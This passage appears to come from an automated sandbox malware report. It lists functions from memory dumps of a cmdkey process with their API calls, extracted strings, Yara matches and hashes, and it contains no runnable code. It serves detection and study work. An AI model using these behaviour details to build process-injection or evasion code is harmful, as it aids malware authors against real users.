                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 69783c33f9e567d29cedca3575a5eb95420d78909695031112224755da32c803
                                                  • Instruction ID: 672c03b7f04c50367310dc7b87345e27d91eb9ee5bfd11b261c3925242739d1b
                                                  • Opcode Fuzzy Hash: 69783c33f9e567d29cedca3575a5eb95420d78909695031112224755da32c803
                                                  • Instruction Fuzzy Hash: 2290022130100403D580B55855186064105D7E1305F51E416E0404954CDB258C566227
                                                  Function 03452C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6817e3858342cdd7b10766228fd38f4b35baef4ec42e019f786cf35b0528d82c
                                                  • Instruction ID: 99d3ebe05f6cfef5f901e1435c085117d462428b6eadf2024393967c58cbce00
                                                  • Opcode Fuzzy Hash: 6817e3858342cdd7b10766228fd38f4b35baef4ec42e019f786cf35b0528d82c
                                                  • Instruction Fuzzy Hash: 5490022921300402D5C0B558550860A010587D1206F91E81AA0005958CCB258C696327
                                                  Function 03452CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1a74a92f8f568ef760d684a7bd00edf76e89e0f770a0c9a4ec2ca21bfb26bb6
                                                  • Instruction ID: d9878b7745b623be8007d923767f38e9eb826262e47a34ca86d89e241c6e1da1
                                                  • Opcode Fuzzy Hash: d1a74a92f8f568ef760d684a7bd00edf76e89e0f770a0c9a4ec2ca21bfb26bb6
                                                  • Instruction Fuzzy Hash: 83900221242045525985F5584504507410697E0245791D417A1404D50CC7369C56E627
                                                  Function 0333F36F Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485478255.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_3330000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MuW
                                                  • API String ID: 0-3612093263
                                                  • Opcode ID: 678ba1d346f937c2961ae1e9b31601c3db148a2dd7c6f1bda2fc835376b364b3
                                                  • Instruction ID: 3963b0272833994fb78374312d9c16c703923e95b90a85098aea5931ec195f7c
                                                  • Opcode Fuzzy Hash: 678ba1d346f937c2961ae1e9b31601c3db148a2dd7c6f1bda2fc835376b364b3
                                                  • Instruction Fuzzy Hash: 06E092B2559BA3CAC706DB5DC155749FF64EF53550729908AC8C34A51AC322454A8BA0
                                                  Function 00A40E40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 517 a40e40-a40e41 518 a40e43-a40e45 517->518 519 a40e4e-a40e5e 517->519 520 a40e47 518->520 521 a40e78-a40e7f 518->521 520->519 522 a40e85-a40eca call a44620 call a31410 call a51d70 521->522 523 a40e80 call a5c080 521->523 531 a40ecc-a40edb PostThreadMessageW 522->531 532 a40eea-a40ef0 522->532 523->522 531->532 533 a40edd-a40ee7 531->533 533->532
                                                  APIs
                                                  • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 00A40ED7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 45-0FIUV$45-0FIUV
                                                  • API String ID: 1836367815-1613426581
                                                  • Opcode ID: 022db6098b736b19fe17e2dc7cdfd5a264a67e74bcc446241e34d496b2556ca9
                                                  • Instruction ID: 04215ca5903853eccbab2f6aa077bf83987eb86ff5512b3347114a7d8b777269
                                                  • Opcode Fuzzy Hash: 022db6098b736b19fe17e2dc7cdfd5a264a67e74bcc446241e34d496b2556ca9
                                                  • Instruction Fuzzy Hash: 08110C73940248BBDB119B90AC52DAFF77CEF45764F058499F90867101E23A4E128BE4
                                                  Function 00A40E60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 534 a40e60-a40eca call a5b670 call a5c080 call a44620 call a31410 call a51d70 546 a40ecc-a40edb PostThreadMessageW 534->546 547 a40eea-a40ef0 534->547 546->547 548 a40edd-a40ee7 546->548 548->547
                                                  APIs
                                                  • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 00A40ED7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 45-0FIUV$45-0FIUV
                                                  • API String ID: 1836367815-1613426581
                                                  • Opcode ID: ddd99b7262919eb488fde4438dabf92f893d495e18c1a7bb3d1b31d6661d9ecd
                                                  • Instruction ID: 7c3edc4bbd55c3db04516d0d44ca008cfee5885abdddf6dd6a056496c8061d63
                                                  • Opcode Fuzzy Hash: ddd99b7262919eb488fde4438dabf92f893d495e18c1a7bb3d1b31d6661d9ecd
                                                  • Instruction Fuzzy Hash: F90184B2D4124C7ADB11ABE09D82DEFBB7CEF45794F058064FA0467141D6385E068BB1
                                                  Function 00A40DF7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 614 a40df7-a40df9 615 a40e24-a40eca call a51d70 614->615 616 a40dfb-a40e07 614->616 621 a40ecc-a40edb PostThreadMessageW 615->621 622 a40eea-a40ef0 615->622 616->615 621->622 623 a40edd-a40ee7 621->623 623->622
                                                  APIs
                                                  • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 00A40ED7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 45-0FIUV$45-0FIUV
                                                  • API String ID: 1836367815-1613426581
                                                  • Opcode ID: 66217e57d7096cb6e5486604ff33468cd83fcdbcea0b566d7a2ee4735ba63ec7
                                                  • Instruction ID: d3806ae9ad6af281fcf19bde7d60e4df8622c2205f3ca945485fb9e8cd7913ac
                                                  • Opcode Fuzzy Hash: 66217e57d7096cb6e5486604ff33468cd83fcdbcea0b566d7a2ee4735ba63ec7
                                                  • Instruction Fuzzy Hash: 33F02B7690115DBADF119BE09C83CFFB77CEF85754B448465F714A7140D2394D029BA1
                                                  Function 00A40E23 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 624 a40e23-a40eca call a51d70 628 a40ecc-a40edb PostThreadMessageW 624->628 629 a40eea-a40ef0 624->629 628->629 630 a40edd-a40ee7 628->630 630->629
                                                  APIs
                                                  • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 00A40ED7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 45-0FIUV$45-0FIUV
                                                  • API String ID: 1836367815-1613426581
                                                  • Opcode ID: f9727a56c7610c9ce31952d5938b489374a348ffb2217f94aab8b87e09cebb1c
                                                  • Instruction ID: 625342bc7f41e7948b96fb6279dca1c101a661822ab742536cc3c5fc6f02c32d
                                                  • Opcode Fuzzy Hash: f9727a56c7610c9ce31952d5938b489374a348ffb2217f94aab8b87e09cebb1c
                                                  • Instruction Fuzzy Hash: FBF0A7B690114D7ADB119A909D83DFFB77CEE85790B058069FA04A7240E2394E129BA1
                                                  Function 00A53C10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 00A53CEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: fefad24d8fdffe2327be90b5f52ac8545aa42dfb4a86ab7b00a701a14cc02c40
                                                  • Instruction ID: c75cecd80249142ed9c2e7d7bf871542bdddc90c6de6914fcca7dff9866cf30a
                                                  • Opcode Fuzzy Hash: fefad24d8fdffe2327be90b5f52ac8545aa42dfb4a86ab7b00a701a14cc02c40
                                                  • Instruction Fuzzy Hash: C3316EB2601205BBDB14DFA4C981FEBB7B8FB88741F10451CFA1E6B241D774AA44CBA4
                                                  Function 00A4F63A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  • Opcode ID: d58d3ad3f6c23149d8398a65e5081b5e97961936db7071103d0d8dae40d00cb9
                                                  • Instruction ID: c45d672ef102aad3c5b4f8334f87081e0c81108b75cdd3ad8b2ca82bc4650b42
                                                  • Opcode Fuzzy Hash: d58d3ad3f6c23149d8398a65e5081b5e97961936db7071103d0d8dae40d00cb9
                                                  • Instruction Fuzzy Hash: 9A312FB5A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E905EB214D775EE45CBA0
                                                  Function 00A4F640 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  • Opcode ID: 61a04c7a9635ba64a24160844dfb5f5275c50d7a62f6ab79a7fd241cc5e09ad4
                                                  • Instruction ID: 146f7f293de61cce5c110a620f679311672f454dc56c23ca502a706883a57e32
                                                  • Opcode Fuzzy Hash: 61a04c7a9635ba64a24160844dfb5f5275c50d7a62f6ab79a7fd241cc5e09ad4
                                                  • Instruction Fuzzy Hash: D4311EB5A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E915EB214D775EE45CBA0
                                                  Function 00A44620 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A44692
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                  • Instruction ID: e784e5ffd9fa10869577702c041cba890ed616e8e3ba4e969e25299df81a504d
                                                  • Opcode Fuzzy Hash: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                  • Instruction Fuzzy Hash: 29011EB9E4020DABDF10EBE4DD42F9DB7B8AB54319F004195AD0897241F671EB18CB91
                                                  Function 00A59900 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,00A4844E,00000010,?,?,?,00000044,?,00000010,00A4844E,?,?,?), ref: 00A59963
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                  • Instruction ID: 8eba83334f9809f7da97800aa6702b0bfc7dfcea224d502f6d7de5d1e98af6df
                                                  • Opcode Fuzzy Hash: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                  • Instruction Fuzzy Hash: 1101D2B2204208BBCB44DE99DC81EEB77ADAF8C714F018608BA0DE3241D630F8518BA4
                                                  Function 00A39AF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A39B35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 467a66f041e93a30925ab54a74a94ee60747d33581ac78a1eff4d6a53f05c08d
                                                  • Instruction ID: e61af2efa0bbc17027b0b1d2b2af993263f8bfe4bdce9e03cc63d83192c2915c
                                                  • Opcode Fuzzy Hash: 467a66f041e93a30925ab54a74a94ee60747d33581ac78a1eff4d6a53f05c08d
                                                  • Instruction Fuzzy Hash: 70F0657338020436E32076EAAC03FD7B29CDB81761F140425FB0CDB1C1D9A5F84542E4
                                                  Function 00A39AEC Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A39B35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: b7104b9d747e935088b0e9e47ecac50d0ec8158323838ae5b056e42438e9ff63
                                                  • Instruction ID: ca6108b6c2e4a52dd4a48af2a96b4a461d0829a1841327382e60eb4e5c43eb69
                                                  • Opcode Fuzzy Hash: b7104b9d747e935088b0e9e47ecac50d0ec8158323838ae5b056e42438e9ff63
                                                  • Instruction Fuzzy Hash: 5DE0927338020036E23076D99C03FD7B6AC9F81B61F140015FB0CAB1C1D9A5F84483E4
                                                  Function 00A4469C Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A44692
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 8ae6c87d1062e41b2745643221b85222a707d48f99fe44d78231358a06c4703a
                                                  • Instruction ID: 98f679f59e78bd689ae3f6b20b36cb18481fe8b751d82eb893c379e01679a63e
                                                  • Opcode Fuzzy Hash: 8ae6c87d1062e41b2745643221b85222a707d48f99fe44d78231358a06c4703a
                                                  • Instruction Fuzzy Hash: B3E0927594401ABFDF10DA98CC86FDEFF39EB8A304F004284F50897241D6709914CB90
                                                  Function 00A59820 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00A41AE6,?,00A5580B,00A41AE6,00A557FF,00A5580B,?,00A41AE6,00A557FF,00001000,?,?,00000000), ref: 00A5985F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                  • Instruction ID: 309b32de1aa88c0d9321cb48cb1688a6e1efa58832a8cefbce71c9067242ddbe
                                                  • Opcode Fuzzy Hash: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                  • Instruction Fuzzy Hash: 93E065B22042047BCA10EE59DC42FAB77ACEF89B10F004019FA08A7242CA70B8118BB9
                                                  Function 00A59870 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFEB8,00000007,00000000,00000004,00000000,00A43EA1,000000F4), ref: 00A598AC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 3c882aa763a3663f21b403435092974dd4be2cf2061f2f14c9468e1c5220bb38
                                                  • Instruction ID: acbd713ff0f8e9fc3a3866bdcf41de21d4ce8c85aade6bfa11503a9124680c3a
                                                  • Opcode Fuzzy Hash: 3c882aa763a3663f21b403435092974dd4be2cf2061f2f14c9468e1c5220bb38
                                                  • Instruction Fuzzy Hash: 34E065B6204204BBDA10EE59EC41FAB77ADEFC8710F004009FA0CA7241D670B8108AB8
                                                  Function 00A48490 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A484BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                  • Instruction ID: e4168cfa905b2f6d8b8e9ea485f4779545eccdc5504503b802b541e4d3e0d58b
                                                  • Opcode Fuzzy Hash: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                  • Instruction Fuzzy Hash: 1DE0807565020467E72467B8EC45F79335C9788724F594950B91CDB5C1D67CF9414150
                                                  Function 00A48279 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00A41DE0,00A5813F,00A557FF,00A41DB0), ref: 00A482B3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                  • Instruction ID: 1c783adc2d2024ed0eab6c8862a628e7e0dc6bba127714dee15e5edd39934c93
                                                  • Opcode Fuzzy Hash: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                  • Instruction Fuzzy Hash: FFE0C2792402043BE600A6E1AD06F7932DCA784354F040468BD18EB2C2EDB9A4104564
                                                  Function 00A48280 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00A41DE0,00A5813F,00A557FF,00A41DB0), ref: 00A482B3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                  • Instruction ID: 0f06e43cdadbbe76ea461dc81b2c3591d0e78e355983d2a4bbf3d6789ee0f41c
                                                  • Opcode Fuzzy Hash: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                  • Instruction Fuzzy Hash: 36D05E766802047BE600F6E59D07F6A32CCAB44754F044464BD18EB3C2E9A9F41046A5
                                                  Function 03452B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ba79bd721edc1809d3385598f53de68f5f2f19f6d3276533ab03d348920f69d6
                                                  • Instruction ID: 076e8ee1d2ad174387c3ec302483a27ad4ca5cc68030a181da578b2b4f9f546d
                                                  • Opcode Fuzzy Hash: ba79bd721edc1809d3385598f53de68f5f2f19f6d3276533ab03d348920f69d6
                                                  • Instruction Fuzzy Hash: B2B09B71D014C5C5DA51DF6047087177A0467D0705F15C457E1460A51F8778C491F17B

                                                  Non-executed Functions

                                                  Function 033304E8 Relevance: .1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485478255.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_3330000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                  • Instruction ID: d616b8dedcbcb7431d8c98698b6d5ebd01986699ecffbee81466131ca397271f
                                                  • Opcode Fuzzy Hash: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                  • Instruction Fuzzy Hash: 6441B075A1CB094FD368EF6894C16B6B2E5FB8A300F10452DD88BC3252EB74E8468685
                                                  Function 0333E020 Relevance: 57.7, Strings: 46, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485478255.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_3330000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3754132690
                                                  • Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                  • Instruction ID: afb6ae9482476a43432b0eddd1ebf619e092213d19e99a8c0b241c49a38dc609
                                                  • Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                  • Instruction Fuzzy Hash: 62914FF04483988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                                  Function 03447550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Execute=1, xrefs: 0348451E
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03484530
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03484592
                                                  • ExecuteOptions, xrefs: 034844AB
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03484460
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03484507
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0348454D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
